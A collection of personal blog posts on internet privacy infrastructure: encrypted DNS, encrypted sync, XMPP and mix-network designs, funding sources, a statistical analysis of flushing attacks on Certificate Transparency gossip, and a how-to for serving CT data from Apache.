Over in the DPRIVE group in the IETF folks are developing how exactly to put DNS into TLS and DTLS. It's not that difficult, and you wind up with a relatively straightforward, multiplexed protocol. (The multiplexed is absolutely critical for performance so I want to mention that up front.) But the problem with encrypted DNS isn't the protocol. It's the deployment.

Right now the majority of people get their DNS from one of two places: their ISP or Google. The purpose of encrypted DNS is to protect your DNS queries from local network tampering and sniffing. So who do you choose to be on the other end of your encrypted DNS tunnel? Assuming they roll out the feature, do you choose Google? Or do we hope our ISPs provide it? Who hosts the encrypted DNS is a pretty big problem in this ecosystem.

The second big problem in this ecosystem is how applications on your machine perform DNS queries. The answer to that is getaddrinfo or gethostbyname - functions provided by the Operating System. So the OS is really the first mover in this equation - it needs to build in support for encrypted DNS lookup. But nameservers are almost always obtained by DHCP leases, so we need to get the DHCP servers to send locations of (D)TLS-supporting DNS resolvers once we somehow convince ISPs they should run them.

There's one other option, besides the OS, that could build support for encrypted DNS, and that's the browser. A browser could build the feature and send all its DNS requests encrypted and that would make a difference to users.

But, if a browser was to ship this feature before the OS, they would need to set a default encrypted DNS server to use. Let's be very clear about what we're talking about here: the browser is adding a dependency on an external service, such that if the service stops working the browser either breaks or performance degrades. We know, because we have seen over and over again, that browsers will not (and reasonably can not) rely on some third party who's expected to maintain good enough uptime and latency to keep their product working. So this means the browser has no choice but to run the encrypted DNS server themselves, and thereby making their product phone home for every browsing interaction you make. And that's worse, to them, than sending the DNS in plaintext.

Magic Folder

Dropbox and all these cloud syncronized folders things sure seem great. But maaaaybe I don't really want to give them all my files in plaintext. Surely there's something the cryptography can do here, right? Either a Dropbox alternative that encrypts the files and stores them in a cloud, or a shim that encrypts the files in folder 'Plaintext' and puts the ciphertext into Dropbox's syncced folder. (And to be clear, I'm not interested in encrypted backup, I'm interested in encrypted file synchronization.)

There are a couple of contenders - there's sparkleshare which is basically a hopefully-friendly UI over a git repo that you can access over Tor if you wish. And the encrypted backup service TAHOE-LAFS is working on a Magic Folder feature also.

I also know there are a lot of commercial offerings out there - I would start here for researching both Dropbox alternatives and encrypting shims. But my hopes aren't too high since I want something cross-platform, open source, with a configurable cloud destination (either my own location or space I pay them for.)

Services Hosting

Google seems to be pretty decent when it comes to fighting for the user - they push back on legal requests that seem to be over-broad and don't just roll over when threatened. But who would you trust more to fight against legal requests: Google.... or the ACLU? Google... or the EFF?

I would pay a pretty penny to either the ACLU or EFF to host my email. Today, more and more services are being centralized and turning into de-facto monopolies. Google (email, dns, and often an ISP), Akamai and Cloudflare (internet traffic), Charter and Comcast (ISPs). It's surprisingly hard to get information about what portion of the internet is in Amazon EC2 - a 2012 report said 1% of the Internet (with one-third of internet users accessing it daily) and the Loudon, Virginia county economic-development board claimed in 2015/2016 that 70% of the internet's traffic worldwide goes through that region. This centralization of the internet into a few providers is happening in conjunction with the region-izing the Internet by promoting national services over international (China is most famous for this, but you see it elsewhere too.) And when national services can't compete, the government incentivizes companies like Google to set up offices and data centers - which seems like a no brainer until you realize the legal implications of pissing off a government who has jurisdiction of your employees and facilities.

The Internet was built to be decentralized and federated, and we're losing that. Furthermore, we're delegating more of our data to publicly traded third party companies - and with that data goes our rights. So I'd like to trust the people who are most invested in protecting our rights with my data - instead of the companies.

And there's a lot more than just email that I'd like them to run. I'd love for them to be my ISP for one. Then there's Google's DNS servers which see god-knows-how-much of the internet's traffic. I'm really uncomfortable with them getting that amount of data about my everyday web usage. There are good-of-the-internet public services like Certificate Transparency Logs and Auditors, the Encrypted DNS and Magic Folder services I mentioned earlier, as well as Tor nodes. But let's start with something simple: VPS Hosting and Email. Those are easily monetized.

RDNC & OMAPI

What the heck are these? RDNC is a remote administration tool for BIND. OMAPI is a remote administration tool for DHCPd. As far as I can tell, both protocols are obscure and rarely investigated and only meant to be exposed to authorized hosts. But back when I did network penetration tests they were always popping up. I never got the chance to fuzz or audit them, but I bet you money that there are cryptographic errors, memory corruption, and logic errors lurking inside these extremely popular daemons. Want to make the Internet upgrade? This is my secret I'm telling you - start here.

XMPP Chat Relay Network

Alright, this one is kind of out there. Stay with me through it. First - let's assume we want to keep (and invest in) federated XMPP even though there's some compelling reasons that isn't a great idea. So we've got XMPP (and OTR - pretend we got everyone OTR and upgraded the protocol to be more like Signal). There's some downsides here in terms of metadata - your server has your address book and it knows who you talk to, when, and the OTR ciphertext. Let's solve those problems.

First, let's create a volunteer, community run network of XMPP servers that allow anonymous registration. (Kind of like the Tor network, but they're running XMPP servers.) These servers auto-register to some directory, just like the Tor network, and your client downloads this directory periodically. They don't live forever, but they're reasonably long-lived (on the order of months) and have good uptime.

Second, let's create an incredibly sophisticated 'all-logic on the client' XMPP client. This XMPP client is going to act like a normal XMPP client that talks to your home server, but it also builds in OTR, retrieves that directory of semi-ephemeral servers, and does a whole lot more logic we will illustrate.

Let's watch what happens when Alice wants to talk to Bob. Alice creates several (we'll say three) completely ephemeral identities (maybe over Tor, maybe not) on three ephemeral servers, chooses one and starts a conversation with bob@example.com. There's an outer handshake, but subsequent to that, Alice identifies herself not only as jh43k45bdk@j4j56bdi4.com but also as her 'real identity' alice@example.net. Now that Bob knows who he's talking to, he replies 'Talk to me at qbhefeu4v@zbdkd3k5bf.com with key X' (which is one of three new ephemeral accounts he makes on ephemeral servers). Alice does so, changing the account she used in the process. Now Alice and Bob are talking through an ephemeral server who has no idea who's talking.

This type of protocol needs a lot of fleshing out, but the goals are that 'home' servers provide a friendly and persistent way for a stranger to locate a known contact but that they receive extremely little metadata. The XMPP servers that see ciphertext don't see identities. The XMPP servers that see identities don't see ciphertext. Clients regularly rotate ephemeral addresses to communicate with.

Mix Networks for HTTP/3

Here's another one that's pretty far out there. Look at your browser. Do you have facebook, twitter, or gmail open (or some other webmail or even outlook/thunderbird) - idling in some background tab, occasionally sending you notices or alerts? I'd be surprised if you didn't. A huge portion of the web uses these applications and a huge portion of their usage is sitting, idle, receiving status updates.

HTTP/2 was designed to be compatible with HTTP/1. Specifically, while the underlying transport changed to a multiplexed protocol with new compression applied - the notion of request-response with Headers and a Body remained unchanged. I doubt HTTP/3 will make any such compatibility efforts. Let's imagine what it might be then. Well, we can expect that in the future more and more people have high-bandwidth connections (we're seeing this move to fiber and gigabit now) but latency will still stink. Don't get me wrong, it will go down, but it's still slow comparatively. That's while there's the big push for protocols with fewer round trips. There's a lot of 'stuff' you have to download to use gmail, and even though now it's multiplexed and maybe even server push-ed the 'startup' time of gmail is still present. Gmail has a loading indicator. Facebook does too.

So I could imagine HTTP/3 taking the notion of server push even further. I can easily imagine you downloading some sort of 'pack'. A zipfile, an 'app', whatever you want to call it. It's got some index page or autorun file and the 'app' will load its logic, its style, its images, and maybe even some preloaded personal data all from this pack. Server push taken even further. Periodically, you'll receive updates - new emails will come in, new tweets, new status posts, new ads to display. You might even receive code updates (or just a brand-new pack that causes what we think of today as 'a page refresh' but might in the future be known as an 'app restart').

So if this is what HTTP/3 looks like... where does the Mix Network come in? Well... Mix Networks provide strong anonymity even in the face of a Global Passive Adversary, but they do this at the cost of speed. (You can read more about this over here and in these slides.) We'd like to use Mix Networks more but there's just no 'killer app' for them. You need something that can tolerate high latency. Recent designs for mix networks (and DC-nets) can cut the latency down quite a bit more from the 'hours to days' of ye olde remailers - but in all cases mix networks need to have enough users to provide a good anonymity set. And email worked as a Mix Network... kinda. You had reliability and spam problems, plus usability.

But what if HTTP/3 was the killer app that Mix Networks need. In Tor had a hybrid option - where some requests got mixed (causing higher latency) and others did not (for normal web browsing) - you could imagine a website that loaded it's 'pack' over onion routing, and then periodically sent you data updates using a mix network. If I'm leaving my browser sitting idle, and it takes the browser 5 or 10 minutes to alert me I have a new email instead of 1, I think I can live with that. (Especially if I can manually check for new messages.) I really should get less distracted by new emails anyway!

Sources of Funding

Okay, so maybe you like one of these ideas or maybe you think they're all shit but you have your own. You can do this. Required Disclaimer: While I am affiliated with some of these, I do not make the first or last funding decision for any of them and am speaking only for myself in this blog post. They may all think my ideas are horrible.

Open Tech Fund is a great place to bring whole application ideas (or improvements to applications) - stuff like the Privacy Preserving Location Sharing, Secure Mobile Encryption with a PIN, or Authenticated WebRTC Video Chats. Take those to their Internet Freedom Fund. You can also propose ideas to the Core Infrastructure Fund - Encrypted Email Delivery and Encrypted DNS implementations are great examples. In theory, they might take some of the way-far-out-there experiments (Update Transparency, Remote Server Attestation, Mix Networks) - but you'd probably need to put in some legwork first and really suss out your idea and make them believe it can be done.

The Linux Foundation's Core Infrastructure Initiative is really focusing on just that - Core Infrastructure. They tend to be interested in ideas that are very, very broadly applicable to the internet, which I have not focused on as much in this post. Better Faster Compiler Hardening is a good candidate, as is grsecurity (but that's a can of worms as I mentioned.) Still, if you can make a good case for how something is truly core infrastructure, you can try!

Mozilla's MOSS program has a track, Mission Partners that is the generic "Support projects that further Mozilla's mission" fund. It's the most applicable to the ideas here, although if you can make a good case that Mozilla relies on something you want to develop, you could make a case for the Foundational Technology fund (maybe compiler hardening or update transparency).

And there are a lot more (like a lot more) funding sources are out there. Not every source fits every idea of course, but if you want to unshackle yourself from a job doing things you don't care about and work on Liberation Technology - the options are more diverse than you might think.

Thanks

This was a big-ass blog post. Errors are my own, but Aaron Grattafiori and Drew Suarez helped fix many of them. Dan Blah pushed me to write it.

A Bit on Certificate Transparency Gossip

27 Jun 2016 17:17 EDT

For the past year and change I've been working with dkg and Linus Nordberg on Certificate Transparency Gossip. I'll assume you're familiar with Certificate Transparency (you can read more about it here.) The point of CT Gossip is to detect Certificate Transparency logs that have misbehaved (either accidentally, maliciously, or by having been compromised.)

The CT Gossip spec is large, and complicated - perhaps too complicated to be fully implemented! This blog post is not about an overview of the specification, but rather about a nuanced problem we faced during the development - and why we made the decision we made. I'll take this problem largely into the abstract - focusing on the difficulty of providing protections against an intelligent adversary with statistics on their side. I won't reframe the problem or go back to the drawing board here. I imagine someone will want to, and we can have that debate. But right now I want to focus on the problem directly in front of us.

The Problem

In several points of the Gossip protocol an entity will have a bucket of items. We will call the entity the 'server' for simplicity - this is not always the case, but even when it is the web browser (a client), we can model it as a server. So the server has a bucket of items and a client (who will be our adversary) can request items from the bucket.

The server will respond with a selection of items of its choosing - which items and how many to respond with are choices the server makes. The server also chooses to delete items from the bucket at a time and by a policy of the server's choosing.

What's in the bucket? Well by and large they are innocuous items. But when an adversary performs an attack - evidence of that attack is placed into the bucket. The goal of the adversary is to 'flush' the evidence out of the bucket such that it is not sent to any legitimate clients, and is only sent to the adversary (who will of course delete the evidence of their attack.) Besides requesting items from the bucket, the attacker can place (innocuous) items into the bucket, causing the bucket to require more storage space.

The adversary can create any number of Sybils (or fake identities) - so there's no point in the server trying to track who they send an item to in an effort to send it to a diversity of requestors. We assume this approach will always fail, as the adversary can simply create false identities on different network segments.

Similarly, it's not clear how to distinguish normal client queries from an adversary performing a flushing attack. So we don't make an effort to do so.

Our goal is to define policies for the 'Release' Algorithm (aka 'which items from the bucket do I send') and the 'Deletion' Algorithm (aka 'do I delete this item from the bucket') such that an attacker is unsure about whether or not a particular item (evidence of their attack) actually remains in the bucket - or if they have successfully flushed it.

Published Literature

This problem is tantalizingly close to existing problems that exist in mix networks. Perhaps the best treatment of the flushing attack, and how different mixing algorithms resist it, is From a Trickle to a Flood from 2002.

But as intimated - while the problem is close, it is not the same. In particular, when (most | deployed) mix networks release a message, they remove it from the server. They do not retain it and send a duplicate of it later. Whereas in our situation, that is absolutely the case. This difference is very important.

The second difference is the attacker's goal. With Mix Networks, the attacker's goal is not to censor or discard messages, but instead to track them. In our model, we do want to eliminate messages from the network.

Defining The Attacker

So we have defined the problem: Server has a bucket. Attacker wants to flush an item from the bucket. How can we make the attacker unsure if they've flushed it? But we haven't defined the capabilities of the attacker.

To start with, we assume the attacker knows the algorithm. The server will draw random numbers during it, but the probabilities that actions will be taken are fixed probabilities (or are determined by a known algorithm.)

If we don't place limits on the attacker, we can never win. For example, if the attacker is all-powerful it can just peek inside the bucket. If the attacker can send an infinite number of queries per second - infinity times any small number is still infinity.

So we define the costs and limits. An attacker's cost is time and queries. They need to complete an attack before sufficient clock time (literally meaning hours or days) elapses, and they need to complete the attack using less than a finite number of queries. This number of queries is actually chosen to be a function of clock time - we assume the attacker has infinite bandwidth and is only gated by how quickly they can generate queries. We also assume the attacker is able to control the network of the server for a limited period of time - meaning they can isolate the server from the internet and ensure the only queries it receives are the attacker's. (Not that the server knows this of course.)

The defender's cost is disk space. With infinite disk space, the defender can win - we must design a mechanism that allows the defender to win without using infinite disk space.

An attacker WINS if they can achieve ANY of these three objectives:

Determine with certainty greater than 50% whether an item remains in the opponent's bucket while sending fewer than M queries to the opponent.
Determine with certainty greater than 50% whether an item remains in the opponent's bucket before N amount of time has past
Cause the defender to use more than O bytes of storage.

M is chosen to be a number of queries that we consider feasible for an attacker to do in a set period of time. N is chosen to be long enough that sustaining the attack represents undue political or technical burden on an adversary. O is chosen to be a disk space size large enough that client developers or server operators are scared off of deploying Gossip.

Let's nail down M. RC4NoMore claims an average of 4450 requests per second from a javascript-driven web browser to a server. They had an incentive to get that number as high as they can, so we're going to use it. We'll pick an arbitrary amount of click time for the attacker to do this - 2 straight days. That's 768,960,000 queries or ~768 Million. Now technically, an adversary could actually perform more queries than this in a day under the situation when the 'server' is a real HTTP server, and not the client-we're-treating-as-the-server -- but we you'll see in a bit we can't provide protection against 768 Million queries, so why use a bigger number?

Those numbers are pretty well established, but what about N and O? Basically, we can only make a 'good guess' about these. For example, sustaining a BGP hijack of Twitter or Facebook's routes for more than a short period of time would be both noticeable and potentially damaging politically. TLS MITM attacks have, in the past, been confined to brief period of time. And O? How much disk space is too much? In both cases we'll have to evaluate things in terms of "I know it when I see it."

An Introduction to the Statistics We'll Need

Let's dive into the math and see, if we use the structure above, how we might design a defense that meets our 768-million mark.

It turns out, the statistics of this isn't that hard. We'll use a toy example first.

When I query the server, it has a 10% chance of returning an object, if it has it - and it performs this 10% test for each item. (You'll note that one of the assumptions we make about the 'Retrieval Algorithm' is that is evaluates each item independently.)

Thanks to the wonder of statistics - if it never sends me the object, then is no way to be certain it does not have it. I could have just gotten really, really unlucky over those umpteen million queries.

But the probability of being that unlucky, of not receiving the object after N queries if the server has it - that can be calculated. I'll call this, colloquially, being 'confident' to a certain degree.

How many queries must I make to be 50% confident the server does not have an object? 75%? 90%?

Assume the server has the item. The probability of not receiving the item after one query is 90%.
After two queries: 90% x 90% or 81%. Successive multiplications yield the following:
~59% chance of not receiving the item after 5 queries
~35% chance of not receiving the item after 10 queries

The equation is a specific instance of the Binomial Probability Formula:

 F(n) = nCr * p^r * q^(n-r)
      nCr is the 'n choose r' equation:  n! / (r! * (n-r)!)
      p is the probability of the event happening (here .1)
      r is the number of desired outcomes (here it is 0 - we want no item to be returned)
      q is the probability of the event not happening (here 1 - .1 or .9)
      n is the number of trials

Our equations can be checked:

I must make 22 queries to be 90% confident the server does not have the item.

Also worth noting is that equation can be thankfully simplified. Because r is 0, we only need to calculate q^(n) - which matches our initial thought process.

Going Back to the 768 Million

So here's what to do with this math: I can use this method to figure out what the probability of sending an item will need to be, to defend against an attacker using the definition of winning we define above. I want .50 = q^(768million). That is to say, I want, after 768 Million queries, an attacker to have a 50% confidence level that the item does not remain in the bucket.

Now it just so happens that Wolfram Alpha can't solve the 768-millionth root of .5, but it can solve the 76.896 millionth root of .5 so we'll go with that. It's .99999999098591.

That is to say, to achieve the 50% confidence interval the probability of sending an item from the bucket needs to be about .00000009%.

Do you see a problem here? One problem is that I never actually defined the defender having the goal of ever sending an item! At this probability, an item has a 50% of being sent after about 50 million requests. I don't know how long it takes Google to reach the number of visits - but realistically this means the 'evidence of attack' would just never get shared.

So.... Send it more frequently?

This math, sending it so infrequently, would surely represent the end game. In the beginning, surely we would send the item more frequently, and then the more we send it, the less often we would send it. We could imagine it as a graph:

   |
   |  x
   |   x
   |    x
   |      x
   |        x
   |          x
   |            x
   |              x
   |                 x
   |                    x
   |                        x
   |                             x
   |                                  x
   |                                        x
   |                                                x
   |                                                            x
   |                                                                              x
   +-------------------------------------------------------------------------------

But the problem, remember, is not just figuring out when to send the item, but also when to delete it.

Consider Deleting After Sending?

Let's imagine a simple deletion algorithm.

The server will 'roll for deletion' after sending the item to a client who requests it.
The likelihood of deletion shall be 1%.

Now recall in the beginning, after an item is newly placed into the bucket, it shall be sent with high probability. Let's fix this probability at a lowly 40%, and say this probability applies for the first 500 times it is sent. What is the probability that an item has been deleted by the 500th response? It is 99%. And how many queries are needed on average by the attacker to have the item returned 500 times at 40% probability of sending? It is (thanks to some trial and error) 1249.

What this means is that an attacker who sends on average 1249 queries in the beginning (right after the evidence of the attack goes into the bucket) can be supremely confident that the item has been deleted.

Then, the attacker sends more queries - but far fewer than the 768-million figure. If the item is not returned in short order, the attacker can be very confident that the item was deleted. This is because at the top of that curve, the likelihood of receiving the item quickly is very good. When the item doesn't appear quickly, it's either because the attacker hit a .000000001% chance of being unlucky - or it's because the item was deleted.

'Rolling for deletion' after an item is sent is a poor strategy - it doesn't work when we want to send the item regurally.

A Deletion Algorithm That May Work

The server will 'roll for deletion' every hour, and the odds of deleting an item are... we'll say 5%.

We can use the Binomial Probability Formula, again, to calculate how likely we are to delete the item after so many hours. It's 1 minus the probability of the deletion not occurring, which is .95^num_hours

If we use a rough yardstick of 'Two Days' for the attacker's timeframe (with deletion rolls once an hour) to yield a 50% confidence level, the equation becomes .50 = q^48 or a 1.4% chance of deletion.

But What About Uncertainty!

If you're following along closely, you may have realized a flaw with the notion of "1.4% chance of deletion every hour." While it's true that after 2 days the probability an item is deleted is 50%, an attacker will be able to know if it has been deleted or not!

This is because the attacker is sending tons of queries, and we already determined that trying to keep the attacker in the dark about whether an item is 'in the bucket' requires such a low probability of sending the item that it's infeasible. So the attacker will know whether or not the item is in the bucket, and there's a 50% chance (that the attacker cannot influence) of it being deleted after two days.

This not ideal. But it seems to the best tradeoff we can make. The attacker will know whether or not the evidence has been erased, but can do nothing to encourage it to be erased. They merely must wait it out.

But what About Disk Space?

So far what we've determined is:

A deletion algorithm that is based on how often the server sends the item won't work.
A deletion algorithm that is based on time seems like it will work...

But we haven't determined how much disk will be used by this algorithm. To calculate this number, we must look at the broader CT and CT Gossip ecosystem.

We store two types of data STHs, and [SCTs+Cert Chains]. These are stored by both a Web Browser and Web Server. STHs and SCTs are multiplied by the number of trusted logs in the ecosystem, which we'll place at '20'. We'll make the following size assumptions:

The size of a SCT is ~120 bytes.
The size of a STH is ~250 bytes.
A certificate chain is 5KB.
But a disk sector is 4KB, so everything is 4KB, except for the chain which is 8KB. (Note that this is 'naive storage'. It doesn't include any associated counters or metadata which would increase size, nor does it include more efficient storage mechanisms which would decrease size.)

A server's SCT Store will be limited by the number of certificates issued for the domains it is authoritative for multiplied by the number of logs it trusts. Let's be conservative and say 10,000 certs. ((10000 SCTs * 4 Kb * 20 logs) + (10000 Cert Chains * 8kb)) / 1024 Kb/Mb = 860MB. That's a high number but it's not impossible for a server.

A server's STH store could in theory store every active STH out there. We limit Gossip to STHs in the past week, and STHs are issued on average once an hour. This would be (20 logs * 7 days * 24 hours * 4 Kb) / 1024 Kb/Mb = 13.1MB and that's quite reasonable.

On the client side, a client's STH store would be the same: 13.1MB.

Its SCT store is another story though. First, there is no time limit for how long I may store a SCT. Secondly, I store SCTs (and cert chains) for all sites I visit. Let's say the user has visited 10000 sites, each of which have 3 different certificates with 10 SCTs each. That's ((10000 Sites * 3 Cert Chains * 8 Kb) + (10000 Sites * 3 Certificates * 10 SCTs * 4 Kb)) / 1024 Kb/Mb) / 1024 Mb/Gb = 1.4 GB. On a client, that's clearly an unacceptable amount of data.

Deleting Data From the Client

So what we want to solve is the disk-space-on-the-client problem. If we can solve that we may have a workable solution. A client whose SCT Store is filling up can do one, or more, of the following (plus other proposals I haven't enumerated):

Delete data that's already been sent
Delete new, incoming data (freeze the state)
Delete the oldest data
Delete data randomly

I argue a mix of the the first and last is the best. Let's rule out the middle two right away. These are purely deterministic behavior. If I want to 'hide' a piece of evidence, I could either send it, then fill up the cache to flush it, or flood the cache to fill it up and prevent it being added.

On its face, deleting data at random seems like a surefire recipe for failure - an attacker performs an attack (which places the evidence item in the bucket), then floods the bucket with new items. Once the bucket if full, the probability of the the evidence item being deleted rises with each new item placed in. (With a 30,0000 item cache, the odds of evicting a particular item is 50% after 51,000 queries - 30,000 queries to fill it and 21,000 to have a 50% chance of flushing it.) These numbers are far short of 768-million query figure we wish to protect ourselves against.

Deleting data that's already been sent is a good optimization, but does not solve the problem - if an attacker is flooding a cache, all of the data will be unsent.

We seem to be sunk. In fact - we were unable to come to a generic fix for this attack. The best we can do it make a few recommendations that make the attack slightly more difficult to carry out.

Aggressively attempt Inclusion Proof Resolution for SCTs in the cache. If the SCT is resolved, discard the SCT and save the STH. If this particular SCT is not resolved, but others are, save this SCT. If all SCT resolution fails, take no special action.
Prioritize deleting SCTs that have already been sent to the server. If a SCT has been sent to the server, it means it has been sent over a connection that excludes that SCT. If it was a legit SCT, all is well (it's been reported). If it was a malicious SCT - either it's been reported to the legitimate server (and ideally will be identified) or it's been reported to an illegitimate server necessitating a second, illegitimate SCT we have in our cache.
In the future, it may be possible for servers to supply SCTs with Inclusion Proofs to recent STHs; this would allow clients to discard data more aggressively.

Conclusion

The final recommendation is therefore:

Servers and Clients will each store valid STHs without bound. The size needed for this is a factor of the number of logs and validity window (which is one week). The final size is manageable, under 20MB with naive storage.
Servers will store SCTs and Certificate Chains without bound. The size needed for this is a factor of the number of certificates issued for domains the server is authoritative for, and the number of logs. The final size is manageable for most servers (under 1GB with naive storage) and can be reduced by whitelisting certain certificates/SCTs to discard.
Clients will store SCTs and Certificate Chains in a fixed-size cache of their choosing, employ strategies to make flushing attacks more difficult, but ultimately remain vulnerable to a persistent flushing attack.

Querying CT Logs, Looking For Certificates

25 Mar 2016 2:46 EST

Recently I wanted to run a complex query across every certificate in the CT logs. That would obviously take some time to process - but I was more interested in ease-of-execution than I was in making things as fast as possible. I ended up using a few tools, and writing a few tools, to make this happen.

catlfish: Catlfish is a CT Log server that's written by a friend (and CT Gossip coauther). I'm not interested in the log server, just the tools - specifically fetchallcerts.py to download the logs.
fetchalllogkeys.py: fetchallcerts.py requires the log keys, in PEM format. (Not sure why.) Run this tool to download all the logs' keys.
update-all.sh: fetchallcerts.py only works on one log at a time. A quick bash script will run this across all logs.

With these tools you can download all the certificates in all the logs except the two logs who use RSA instead of ECC. (That's CNNIC and Venafi.) They come down in zipfiles and take up about 145 GB.

Now we need to process them! For that you can use findcerts.py. The way this script works is using python's multiprocessing (one process per CPU) to process a zipfile at a time. It uses pyasn1 and pyx509 to parse the certificates. You write the filtering function at the top of the file, you can also choose which certs to process (leaf, intermediate(s), and root). You can limit the filtering to a single zip file (for testing) or to a single log (since logs will often contain duplicates of each other.)

The example criteria I have in there looks for a particular domain name. This is a silly criteria - there are much faster ways to look for certs matching a domain name. But if you want to search for a custom extension or combination of extensions - it makes a lot more sense. You can look at pyx509 to see what types of structures are exposed to you.

A word on minutia - pyasn1 is slow. It's full featured but it's slow. On the normal library it took about 18 minutes to process a zip file. By using cython and various other tweaks and tricks in both it and pyx509, I was able to get that down to about 4 minutes, 1.5 if you only process leaf certs. So I'd recommend using my branches of pyasn1 and pyx509.

All in all, it's definetly not the fastest way to do this - but it was the simplest. I can run a query across one of the google logs in about 18 hours, which is fast enough for my curiosity for most things.

All About Tor

14 May 2015 00:04:23 EST

A little bit ago NCC Group North America had an all-hands retreat, and solicited technical talks. I fired off a one-line e-mail: "All About Tor - Everything from the Directory Authorities to the Link Protocol to Pluggable Transports to everything in between." And promptly forgot about it for... a couple months. I ended up building the deck, with a level of detail I thought was about 80% of what I wanted, and gave a dry-run for my 45 minute talk. It ran two full hours.

I cut a bunch of content for the talk, but knew I would need to finish the whole thing and make it available. Which I finally did! The slides are available here, and are released CC Attribution-ShareAlike. The source for the presentation is available in keynote format.

Major thanks to all the folks I bugged to build this, especially Nick Mathewson, and those who gave me feedback on mailing lists.

An Experimental "RequireCT" Directive for HSTS

20 Feb 2015 10:54:23 EST

A little bit ago, while in London at Real World Crypto and hanging out with some browser and SSL folks, I mentioned the thought "Why isn't there a directive in HSTS to require OCSP Stapling?" (Or really just hard fail on revocation, but pragmatically they're the same thing.) They responded, "I don't know, I don't think anyone's proposed it." I had batted the idea around a little bit, and ended up posting about it, but it didn't get much traction. I still think it's a good idea I'll probably revisit sometime soon... but while thinking more about it and in other conversations a more immediate thought came up.

What about requiring Certificate Transparency?

The motivation behind requiring Certificate Transparency for your site is to ensure that any certificate used to authenticate your site is publicly logged. Excepting, of course, locally installed roots which everyone is upset with because of SuperFish. But that's independent of the topic at hand. As a site operator, you can be certain that no one has compromised or coerced a CA, maybe even the CA you chose to pin to, into issuing a certificate for your site behind your back. Instead, you can see that certificate in a Certificate Transparency log!

Deployment, and Risks

I mentioned pinning. Pinning is a very strong security mechanism, but also a very risky one. You can lock your users out of your site by incorrectly pinning to the wrong Intermediate CA or losing a backup key. Requiring CT is also risky.

But, the risk of footgunning yourself is much lower, and similar to requiring OCSP Stapling, is mostly around getting yourself into a situation where your infrastructure can't cash the check your mouth just wrote. But CT has three ways to get a SCT to the user: a TLS Extension, a Certificate Extension, and an OCSP Extension. So (in theory) there are more ways to support your decision.

In reality, not so much. Certificate Authorities are gearing up to support CT, and if you work closely with one, you may even be able to purchase a cert with embedded SCTs. (DigiCert says all you have to do is contact them, same with Comodo.) So depending on your choice of CA, you may be able to leverage this mechanism.

Getting an SCT into an OCSP response is probably trickier. Not only does this require the cooperation of the CA, but because most CAs purchase software and hardware to run their OCSP responders it also likely requires that vendor to do some development. ~~I'm not aware of any CA that supports this mechanism of delivering SCTs, but I could be wrong.~~ Apparently, Comodo supports the OCSP delivery option! (And it's very easy for them to enable it, which they so very nicely did for ritter.vg. So you can try it out on this site, live.)

Fortunately, the third mechanism is entirely in your control as the server operator. You can deliver the SCTs in a TLS extension if the client requests them. Sounds great right? Heh. Let's go on an adventure. Or, if you want to skip the adventure and just see the screenshots, you can do that too.

Now, to be clear, CT is in its infancy. So things will get easier. In fact right now CT is only deployed to enable Extended Validation indicators in Chrome - and for nothing else. So don't take this blog post as a critique of the system. Rather take it as jumping ahead a couple years and proofing out tomorrow's protection mechanisms, today.

Let's log a cert.

First off, before you can actually deliver SCTs to your clients, you have to get an SCT - so you have to log your cert. There are several functional, operating logs. Submitting a certificate is not done through a web form, but rather an API, as specified in the RFC.

To help with this, I created a tiny python script. You will need to open your site in your browser first, and download your certificate and the entire certificate chain up to a known root. Store them as Base64-encoded .cer or .pem files. They should be ASCII and start with "-----BEGIN CERTIFICATE-----".

Now call submit-cert.py with the certificate chain, in order, starting with the leaf. You can specify a specific log to submit to, or you can just try them all. No harm in that!

./submit-cert.py --cert leaf.cer --cert intermediate1.cer --cert intermediate2.cer --cert root.cer
rocketeer
        Timestamp 1410307847307
        Signature BAMARzBFAiEAzNhW8IUPJY1c8vbLDAmufuppc9mYdBLbtSwTHLrnklACID5iG8kafP8pcxny1yKciiewhg8VRybMR4h3wJlTV3s5
Error communicating with izenpen
certly
        Timestamp 1424321473254
        Signature BAMARzBFAiA091WNEs3R/SWVjRaAlpwUpY0l/YYgUH3sMYBlI4XB9AIhAPVMyODwhig48IpE0EJgzKpdAi/iorBUIuy1qH4qrO5g
Error communicating with digicert
aviator
        Timestamp 1406484668045
        Signature BAMARzBFAiEA2TVxYDf30ndQlANozAp+HVQ1IFyfGRjsZPa3TZWeeRcCIFFDpPnHQbxfhXQ7bXtueAFiiGG3HfvWqFnc9L+M/+pt
pilot
        Timestamp 1406495947353
        Signature BAMARzBFAiEAvckWLUX2H/p1dPbZmn/kaxeAbAEqehQYsgscJMzrqNYCIGGQaJ0MtG8Z13+nk2sstFAwqN+t8wsAEqNdZZmrL0e0

You can see that we had a few errors: we couldn't submit it to the two CA-run logs: Digicert and Izenpen. I think one of them is restricting IPs and the other may not be accepting the particular root I'm issued off of. No worries though, we got success responses from all 3 Google logs and the other independent log, certly. You'll be able to see your certificates within 24 hours at ctwatch.net which is a monitor and nice front-end for querying the logs. (The only one I'm aware of actually.)

Something else you might notice if you examine things carefully is that your certificate is probably already in the Google logs. (Check ctwatch.net for your cert now.) They pre-seeded their logs with, as far as I can tell, every certificate they've seen on the Internet.

Let's get OpenSSL 1.0.2

Wait, what? Yea, before we can configure Apache to send the TLS extension, we need to make sure our TLS library supports the extension, and in OpenSSL's case, that means 1.0.2. Fortunately, gentoo makes this easy. In general, this entire process is not going to be that difficult if you're already running Apache 2.4 on gentoo - but if you're not... it's probably going to be pretty annoying.

Let's Configure Apache

Okay, now that we're using OpenSSL 1.0.2, we need to configure our webserver to send the TLS extension. This is really where the bleeding edge starts to happen. I'm not aware of any way to do this for nginx or really for anything but Apache. ~~And for Apache, the code isn't even in a stable release, it's in trunk. (And it's not that well tested.) But it does exist, thanks to the efforts of Jeff Trawick.~~

So if you're willing to compile Apache yourself, you can get it working. You don't have to compile trunk, you can instead patch 2.4 and them compile the module specifically. I discovered that it's pretty easily to automatically add patches to a package in gentoo thanks to /etc/portage/patches so that's even better! (For me anyway.)

The two patches you will need for Apache 2.4 I have here and here. These patches (and this process) are based off Jeff's work but be aware his repo's code is out of date in comparison with httpd's trunk, and his patch didn't work for me out of the box. Jeff updated his patch, and it works out-of-the-box (for me). You can find it here.

As of Apache 2.4.20, you no longer need to patch Apache! Thanks Jeff! For more information check out his github repo.

You do need to compile the Apache module. For that, you need to go check out httpd's trunk. After that you need to build the module which is quite simple. There's a sample command right after the checkout instructions, for me it was:

cd modules/ssl
apxs -ci -I/usr/include/openssl mod_ssl_ct.c ssl_ct_util.c ssl_ct_sct.c ssl_ct_log_config.c

